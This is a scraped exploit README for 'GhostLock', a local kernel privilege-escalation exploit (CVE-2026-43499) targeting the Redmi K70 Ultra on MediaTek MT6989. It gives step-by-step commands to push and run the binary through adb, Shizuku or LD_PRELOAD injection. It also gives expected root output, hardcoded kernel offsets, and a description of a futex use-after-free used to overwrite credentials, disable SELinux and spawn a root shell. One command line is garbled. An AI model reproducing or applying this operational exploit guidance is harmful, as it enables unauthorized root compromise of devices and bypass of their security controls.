## https://sploitus.com/exploit?id=C0943F5A-2346-5A86-87D1-4933B8EA6A57
# GhostLock (CVE-2026-43499) – Redmi K70 Ultra (rothko)
A data-only physmap overwrite exploit for MediaTek Dimensity 9300+ (MT6989). Kernel: `6.1.138-android14-11` / HyperOS OS3.0.302.0.WNNCNXM. ## ⚠️ Prerequisites
- **Device**: Redmi K70 Ultra (codename: rothko), Android 14 / HyperOS OS3.0.302.0.WNNCNXM
- **BL has been unlocked** (required — otherwise adb pushing/running Shizuku is impossible)
- Shizuku or `adb shell` can execute arm64 binaries
- The device will restart after execution (kernel panic — expected behavior). To save logs, connect adb logcat in advance.
## 📦 Download
Download the latest version of `ghostlock_rothko_strip` from [GitHub Releases](https://github.com/SlightNeko/ghostlock-rothko/releases). ## 🚀 Testing Method
### Method 1: Through ADB
```bash
# Push the binary to the device
adb push ghostlock_rothko_strip /data/local/tmp/
# Give execute permissions
adb shell chmod 755 /data/local/tmp/ghostlock_rothko_strip
# Run (may restart immediately)
adb shell /data/local/tmp/ghostlock_rothko_strip
```
### Method 2: Through Shizuku
```bash
# Use Shizuku to push the binary
adb shell sh -c 'cat /dev/null > /data/local/tmp/ghostlock_rothko_strip'
# Then use Shizuku’s “Run File” function to select gh lock_rothko_strip'
```
Or use Shizuku’s terminal emulator to execute directly:
```bash
adb shell sh -c 'cp /sdcard/Download/ghostlock_rothko_strip /data/local/tmp/ && chmod 755 /data/local/tmp/ghostlock_rothko_strip && /data/local/tmp/ghostlock_rothko_strip'
```
### Method 3: LD_PRELOAD Injection
```bash
adb push preload.so /data/local/tmp/
adb shell
cd /data/local/tmp
LD_PRELOAD=./preload.so /system/bin/sh -c exit
```
## 📋 Expected Behavior
| Stage | Output | Description |
|------|------|------|
| Initialization | `[*] GhostLock - rothko (MT6989 D9300+) 6.1.138` | Device recognized correctly |
| CPU Binding | `[+] CPU0 pinned` | Bound to CPU0 |
| Address Loading | `[*] init_task @ 0xffffff800206f600` | Fixed LM address |
| Permission Check | `[+] uid: xxxxx` | Prints current UID |
| KASLR Slide | `[+] slide = 0` or `slide = xxx` | KASLR detection |
| Privilege Escalation | After successful execution, UID becomes 0 | Gain root access |
| LD_PRELOAD | Spawn su daemon | Shell injection successful |
| Failure | `[-] ...` + Restart | Kernel panic (vulnerability exists) |
**Note:** `/proc/self/pagemap` has been blocked by SELinux in Android 6.1 kernel. Exploits will fall back to anonymous page brute-force scanning. If you keep getting “No PFN found”, you can manually specify the physical page frame number:
```bash
export EXPLOIT_PFN=0x
./ghostlock_rothko_strip
```
## 🔧 Vulnerability Mechanism (Brief)
CVE-2026-43499 is a **data-only physmap overwrite** vulnerability, exploiting the **use-after-free** of the kernel futex `CMP_REQUEUE_PI` operation.
1. **Vulnerability trigger:** A deadlock loop is created using 3 threads, triggering the UAF of `rt_mutex_waiter`.
2. **Physical address probing:** `/proc/self/pagemap` is read (for root users) or brute-force scanned for anonymous pages (for non-root users).
3. **Privilege escalation:** After finding the affected page in physmap, the current process’s uid/gid is set to 0 using a forged `task_struct` and `cred`.
4. **SELinux bypass:** `selinux_state.enforcing` is set to 0.
5. **Su daemon:** After gaining privileges, a root shell is spawned via a socket.
KernelSnitch (futex timing channel) provides a fallback without pagemap. ## 📊 Debugging Output Format
```text
[*] GhostLock - rothko (MT6989 D9300+) 6.1.138
[+] CPU0 pinned
[*] Using fixed LM addresses
[*] init_task @ 0xffffff800206f600
[*] init_cred @ 0xffffff8002081a68
[+] slide = 0
[+] physmap: leaking task @ phys 0x... [*] fake task at phys 0x... [+] Credentials overwritten! [+] uid: 0 (root!)
```
If the device restarts and there is no output like “Credentials overwritten” → the kernel triggers a panic. This indicates that the vulnerability exists but an offset needs adjustment. ## 🔄 Recompiling
If you have NDK r27+, you can compile it yourself:
```bash
export NDK_ROOT=/path/to/android-ndk-r27
make preload TARGET_HEADER=target.h
```
The output will be in `build/bin/ghostlock_rothko` and `build/bin/preload.so`. ## 🧬 Offset Table
All offsets are derived from the BTF in `vmlinux.elf` and the original bytes of `init_task`:
| Symbol | Virtual Address |
|--------|---------------|
| init_task | 0xffffffc009fef600 |
| init_cred | 0xffffffc00a001a68 |
| entry_task | 0xffffffc009fac318 |
| per_cpu_offset | 0xffffffc009fdb650 |
| root_task_group | 0xffffffc00a1d7580 |
| selinux_enforcing | 0xffffffc00a2293d0 |
Full definitions can be found in [`target.h`](target.h). ## 📜 License
For research/educational purposes only. Use at your own risk. **Original PoC**: [NebuSec/CyberMeowfia](https://github.com/NebuSec/CyberMeowfia) → `IonStack/CVE-2026-43499/exploit/`